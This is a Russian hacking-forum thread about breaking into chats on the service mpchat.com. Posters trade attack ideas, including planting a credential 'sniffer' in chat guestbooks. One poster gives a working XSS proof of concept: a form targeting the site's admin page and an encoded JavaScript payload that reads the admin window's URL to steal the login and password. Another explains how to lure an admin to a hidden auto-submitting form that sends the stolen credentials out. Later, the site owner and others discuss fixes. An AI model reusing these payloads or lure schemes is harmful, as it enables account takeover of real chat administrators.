![]() |
На сайте mpchat.com сервис чатов, там админка крутая должнобыть много дыр, кто нибуть взламывал там чаты? http://forum.antichat.ru/iB_html/non...cons/smile.gif)
|
Сервис дырявый - однозначно ...
Все хожу вокруг, да около ... Нужно исходить из cgi-багов .... |
Вот недостатки, которые я нашел:
1)Смена пароля происходит без запроса старого. Сейчас работаю над формированием этого запроса. 2)В скрытом фрейме можно увидеть пароль администратора |
Ищи чат с гестой, где разрешены вставки картинок, вставляй наш сниффер, и когда админ просмотрит сообщение, то считай, что чат взломан ...
|
Чёт я непонял,
1. причём там cgi если там пхп... 2. там замена пароля только если ты уже зашёл под правильным паролем, темболее высылка пароля на емаил админа который менять вроде вообще нельзя ;(( 3. в каком скрытом фрэйме пароль админа? 4. и что такое ваш сниффер? Вообще можно там как нить напакастить в чате, типо там писать своим шрифтом? или яву скрипт выполнить ... типо закидать окнами ?? http://forum.antichat.ru/iB_html/non...icons/wink.gif |
Блин чё нельзя ничего сделать чтоль?
|
Если этот сайт (antichat.ru) просмотреть не можешь, то ниче с тем чатом нельзя сделать http://forum.antichat.ru/iB_html/non...icons/wink.gif
|
Да я прочитал, просто неверится что там дыр нету...
|
Есть там дыры ...
|
TO ЧЕ ГЕВАРА а нет там дыр!!! ХАХА
|
я нашел xss в одной из страниц этого портала
этот баг позволяет собрать страницу, которая (после открытия ее жертвой) уводит логин и пароль админа (если была открыта админка) или уводит логин и идентификатор пользователя в чате если кому интересно могу дать сорцы =) |
Где там xss ?
|
код для теста xss
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><form action="http://mpchat.com/_admin.php" target="_blank"> <textarea cols="50" rows="5" name="chat" id="chat">z style=`background:url(javascript:alert())`</textarea><br> <input type="submit"> </form>[/QUOTE]<span id='postcolor'> если зайти в админку и открыть страницу с выше указаным кодом потом заменить в поле alert() на </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">document.write(unescape(/%3Cimg%20src=%22javascript:z=window.open(%27%27,%2 7administration%27)%3Balert(z.document.location)%3 B%22%3E/))[/QUOTE]<span id='postcolor'> и послать форму то в новом окне откроется страница c xss иньекцией, которая обратится в окно с именем administration (а именно в нем и открывается админка) и покажет url (а в нем логин и пароль) |
Подожди .. Эти действия нельзя произвести без прав администратора ... Или я что-то не вдогнал ...
|
некто вася зарегил свой чат открыл окно админки
некто петя просит посетить его сайт (к сожелению xss пасивный, т.е. необходимо заманить пользователя) на сайте пети есть невидимая форма с на подобие моего примера, которая автоматический отправляется в скрытый iframe в результате его логин и пароль уходят, к примеру на снифер |
Ну вы ребят даёте, такие сложные комбинации чтобы взломать пароль администратора, необходимо заманить его на этот код, помоему так хоть что можно взломать зная структуру, а пароль он всеравно себе вернёт, можно конечно попробовать и только немного напакостить http://forum.antichat.ru/iB_html/non...icons/wink.gif
|
Народ, а с чего нужно начинать чтобы кумекать с вами на ровне? (т-е хаком) http://forum.antichat.ru/iB_html/non...s/confused.gif
|
Не думаю я, чтомы говорим о чем-то сверхсложном ...
Все приходит со временем ... |
Эт сново я,
похоже всёже ктоко круто поломал мпчата, но так и неизвестно кто. По форуму сервиса видно что сам антиадмин.ру заходил и поломал там пару чатов различным способами. Но вроде и ещё ктото приходил и уложил весь сервак на 2 недели в сон http://forum.antichat.ru/iB_html/non...icons/wink.gif Вообщем щас там востановительные работы. Короче кто что знает по этому поводу напишите как ломается http://forum.antichat.ru/iB_html/non...ons/tounge.gif |
Т.е. не антиадмин, а админ античат.ру http://forum.antichat.ru/iB_html/non...icons/wink.gif
|
Для начала всем привет!!!
Дело в том что админы на моём сервисе жалуются и даже возникают конфликты на то что с вашего сайта взламывают их чаты, а точнее вытаскивают пароли администрации чата и т.д. Если это действительно так и здесь есть такой человек который взломал один из чатов, прошу помочь закрыть дыры. Несколько раз проверял скрипт на дырявость ничего не нашёл! Буду признателен за помощь!! http://forum.antichat.ru/iB_html/non...s/rolleyes.gif |
Вот же написали выше ...
|
Чтобы убереч свой чат от подобного рода взломов, нужно метод get сменить на post, для того чтобы урл в админке не состоял из логина и пароля ...
|
Там возможно но админ чата http://mpchat.com/magiclovechat утверждает что взлом проходит через форму возвращения пароля..
Но там дыры я ненашёл. Кто ломал чат http://mpchat.com/magiclovechat прошу обратиться ICQ: 106096 2002demon@mail.ru |
Может его мыло взломали или еше что-то еще ...
|
Да, мыло у него тоже взломали, на яндексе, но он говорит что взломали чат, узнали пароль а потом взломали и мыло (так как пароли одинаковы), но мне кажется было как раз наоборот!
Кстати Метод Гет оставил но зато поставил вместо пароля ссесию и проверку по ип! |
Вот так будет безопасней ...
Сессия причем толжна быть привязана к ip ... |
Если кому интересно могу тока написать как отправлять сообщения от чужого НЕ ЗАРЕГАННОГО ника который сидит в чате!
|
да забыл сказать вот пишите 402-590-070
|
Сюда пиши, посмотрим на твой способ
|
пофиксили все они... единственное не проверял у них еще была фигня при выходе там xss прокатывала при выходе.... именно на той странице на которую кидает при выходе но повторюсь все это было давно щас заниматься этим мпчатом нет даже желания
|
| Время: 18:01 |